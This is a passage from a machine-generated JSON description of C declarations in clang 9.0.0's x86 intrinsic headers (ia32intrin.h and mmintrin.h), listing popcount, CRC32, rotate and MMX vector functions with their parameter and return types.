"bit-alignment": 64 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__popcntd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:142:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__popcntq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:163:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__readeflags", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:173:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__writeeflags", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:179:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__f", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "__crc32b", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:214:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__C", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__crc32w", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:235:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__C", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__crc32d", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:256:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__C", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__crc32q", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:278:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__C", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__rdpmc", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:285:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__rdtscp", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:291:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_wbinvd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:300:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "__rolb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:305:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "__rorb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:310:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "function", "name": "__rolw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:315:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "function", "name": "__rorw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:320:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "function", "name": "__rold", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:325:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__rord", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:330:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__rolq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:336:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__rorq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ia32intrin.h:341:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__m64", "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:13:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v1di", "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:15:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v2si", "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:16:13", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v4hi", "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:17:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v8qi", "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:18:14", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "function", "name": "_mm_empty", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:31:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_cvtsi32_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:48:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cvtsi64_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:65:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtsi64_m64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:81:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cvtm64_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:97:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_packs_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:127:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_packs_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:157:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_packs_pu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:187:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_unpackhi_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:214:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_unpackhi_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:237:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_unpackhi_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:258:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_unpacklo_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:285:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_unpacklo_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:308:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_unpacklo_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:329:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_add_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:350:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_add_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:371:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_add_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:392:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_adds_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:414:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_adds_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:437:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_adds_pu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:459:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_adds_pu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:481:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sub_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:502:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sub_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:523:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sub_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:544:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_subs_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:567:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_subs_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:590:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_subs_pu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:614:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_subs_pu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:638:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_madd_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:665:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_mulhi_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:686:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_mullo_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:707:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sll_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:730:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_slli_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:752:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sll_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:775:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_slli_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:797:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sll_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:817:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_slli_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:837:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sra_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:861:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_srai_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:884:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sra_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:908:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_srai_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:931:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_srl_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:954:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_srli_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:976:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_srl_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:999:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_srli_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1021:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_srl_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1041:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_srli_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1062:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_and_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1080:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_andnot_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1101:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_or_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1119:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_xor_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1137:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cmpeq_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1159:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cmpeq_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1181:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cmpeq_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1203:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cmpgt_pi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1225:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cmpgt_pi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1247:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_cmpgt_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1269:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__m1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__m2", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_setzero_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1282:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_set_pi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1303:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": 